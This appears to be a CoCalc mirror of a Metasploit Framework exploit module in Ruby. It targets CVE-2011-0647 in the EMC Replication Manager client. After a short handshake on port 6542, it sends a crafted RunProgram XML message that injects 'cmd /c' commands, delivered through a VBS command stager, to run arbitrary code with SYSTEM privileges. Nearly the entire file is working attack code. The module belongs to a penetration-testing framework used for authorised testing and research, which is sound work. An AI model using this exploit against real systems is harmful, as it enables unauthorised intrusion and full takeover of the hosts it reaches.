CoCalc -- replication_manager

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/emc/replication_manager_exec.rb
¹⁹⁷⁵⁸ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::CmdStager
11

12
  def initialize(info = {})
13
    super(
14
      update_info(
15
        info,
16
        'Name' => 'EMC Replication Manager Command Execution',
17
        'Description' => %q{
18
          This module exploits a remote command-injection vulnerability in EMC Replication Manager
19
          client (irccd.exe). By sending a specially crafted message invoking RunProgram function an
20
          attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected
21
          products are EMC Replication Manager < 5.3. This module has been successfully tested
22
          against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft
23
          Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested
24
          against these products.
25
        },
26
        'Author' => [
27
          'Unknown', # Initial discovery
28
          'Davy Douhine' # MSF module
29
        ],
30
        'License' => MSF_LICENSE,
31
        'References' => [
32
          [ 'CVE', '2011-0647' ],
33
          [ 'OSVDB', '70853' ],
34
          [ 'BID', '46235' ],
35
          [ 'URL', 'http://www.securityfocus.com/archive/1/516260' ],
36
          [ 'ZDI', '11-061' ]
37
        ],
38
        'DisclosureDate' => '2011-02-07',
39
        'Platform' => 'win',
40
        'Arch' => ARCH_X86,
41
        'Payload' => {
42
          'Space' => 4096,
43
          'DisableNops' => true
44
        },
45
        'Targets' => [
46
          # Tested on Windows XP and Windows 2003
47
          [ 'EMC Replication Manager 5.2.1 / Windows Native Payload', {} ]
48
        ],
49
        'CmdStagerFlavor' => 'vbs',
50
        'DefaultOptions' => {
51
          'WfsDelay' => 5
52
        },
53
        'DefaultTarget' => 0,
54
        'Privileged' => true,
55
        'Notes' => {
56
          'Reliability' => UNKNOWN_RELIABILITY,
57
          'Stability' => UNKNOWN_STABILITY,
58
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
59
        }
60
      )
61
    )
62

63
    register_options(
64
      [
65
        Opt::RPORT(6542)
66
      ]
67
    )
68
  end
69

70
  def exploit
71
    execute_cmdstager({ :linemax => 5000 })
72
  end
73

74
  def execute_command(cmd, opts)
75
    connect
76
    hello = "1HELLOEMC00000000000000000000000"
77
    vprint_status("Sending hello...")
78
    sock.put(hello)
79
    result = sock.get_once || ''
80
    if result =~ /RAWHELLO/
81
      vprint_good("Expected hello response")
82
    else
83
      disconnect
84
      fail_with(Failure::Unknown, "Failed to hello the server")
85
    end
86

87
    start_session = "EMC_Len0000000136<?xml version=\"1.0\" encoding=\"UTF-8\"?><ir_message ir_sessionId=0000 ir_type=\"ClientStartSession\" <ir_version>1</ir_version></ir_message>"
88
    vprint_status("Starting session...")
89
    sock.put(start_session)
90
    result = sock.get_once || ''
91
    if result =~ /EMC/
92
      vprint_good("A session has been created. Good.")
93
    else
94
      disconnect
95
      fail_with(Failure::Unknown, "Failed to create the session")
96
    end
97

98
    run_prog = "<?xml version=\"1.0\" encoding=\"UTF-8\"?> "
99
    run_prog << "<ir_message ir_sessionId=\"01111\" ir_requestId=\"00000\" ir_type=\"RunProgram\" ir_status=\"0\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>"
100
    run_prog << "<ir_runProgramAppInfo>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt; &lt;ir_message ir_sessionId=&quot;00000&quot; ir_requestId=&quot;00000&quot; "
101
    run_prog << "ir_type=&quot;App Info&quot; ir_status=&quot;0&quot;&gt;&lt;IR_groupEntry IR_groupType=&quot;anywriter&quot;  IR_groupName=&quot;CM1109A1&quot;  IR_groupId=&quot;1&quot; "
102
    run_prog << "&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?	&amp;gt; &amp;lt;ir_message ir_sessionId=&amp;quot;00000&amp;quot; "
103
    run_prog << "ir_requestId=&amp;quot;00000&amp;quot;ir_type=&amp;quot;App Info&amp;quot; ir_status=&amp;quot;0&amp;quot;&amp;gt;&amp;lt;aa_anywriter_ccr_node&amp;gt;CM1109A1"
104
    run_prog << "&amp;lt;/aa_anywriter_ccr_node&amp;gt;&amp;lt;aa_anywriter_fail_1018&amp;gt;0&amp;lt;/aa_anywriter_fail_1018&amp;gt;&amp;lt;aa_anywriter_fail_1019&amp;gt;0"
105
    run_prog << "&amp;lt;/aa_anywriter_fail_1019&amp;gt;&amp;lt;aa_anywriter_fail_1022&amp;gt;0&amp;lt;/aa_anywriter_fail_1022&amp;gt;&amp;lt;aa_anywriter_runeseutil&amp;gt;1"
106
    run_prog << "&amp;lt;/aa_anywriter_runeseutil&amp;gt;&amp;lt;aa_anywriter_ccr_role&amp;gt;2&amp;lt;/aa_anywriter_ccr_role&amp;gt;&amp;lt;aa_anywriter_prescript&amp;gt;"
107
    run_prog << "&amp;lt;/aa_anywriter_prescript&amp;gt;&amp;lt;aa_anywriter_postscript&amp;gt;&amp;lt;/aa_anywriter_postscript&amp;gt;&amp;lt;aa_anywriter_backuptype&amp;gt;1"
108
    run_prog << "&amp;lt;/aa_anywriter_backuptype&amp;gt;&amp;lt;aa_anywriter_fail_447&amp;gt;0&amp;lt;/aa_anywriter_fail_447&amp;gt;&amp;lt;aa_anywriter_fail_448&amp;gt;0"
109
    run_prog << "&amp;lt;/aa_anywriter_fail_448&amp;gt;&amp;lt;aa_exchange_ignore_all&amp;gt;0&amp;lt;/aa_exchange_ignore_all&amp;gt;&amp;lt;aa_anywriter_sthread_eseutil&amp;gt;0&amp"
110
    run_prog << ";lt;/aa_anywriter_sthread_eseutil&amp;gt;&amp;lt;aa_anywriter_required_logs&amp;gt;0&amp;lt;/aa_anywriter_required_logs&amp;gt;&amp;lt;aa_anywriter_required_logs_path"
111
    run_prog << "&amp;gt;&amp;lt;/aa_anywriter_required_logs_path&amp;gt;&amp;lt;aa_anywriter_throttle&amp;gt;1&amp;lt;/aa_anywriter_throttle&amp;gt;&amp;lt;aa_anywriter_throttle_ios&amp;gt;300"
112
    run_prog << "&amp;lt;/aa_anywriter_throttle_ios&amp;gt;&amp;lt;aa_anywriter_throttle_dur&amp;gt;1000&amp;lt;/aa_anywriter_throttle_dur&amp;gt;&amp;lt;aa_backup_username&amp;gt;"
113
    run_prog << "&amp;lt;/aa_backup_username&amp;gt;&amp;lt;aa_backup_password&amp;gt;&amp;lt;/aa_backup_password&amp;gt;&amp;lt;aa_exchange_checksince&amp;gt;1335208339"
114
    run_prog << "&amp;lt;/aa_exchange_checksince&amp;gt; &amp;lt;/ir_message&amp;gt;&lt;/IR_groupEntry&gt; &lt;/ir_message&gt;</ir_runProgramAppInfo>"
115
    run_prog << "<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>"
116
    run_prog_header = "EMC_Len000000"
117
    run_prog_packet = run_prog_header + run_prog.length.to_s + run_prog
118

119
    vprint_status("Executing command....")
120
    sock.put(run_prog_packet)
121
    sock.get_once(-1, 1)
122

123
    end_string = Rex::Text.rand_text_alpha(rand(10) + 32)
124
    sock.put(end_string)
125
    sock.get_once(-1, 1)
126
    disconnect
127
  end
128
end
129

130
Product

Resources

Company
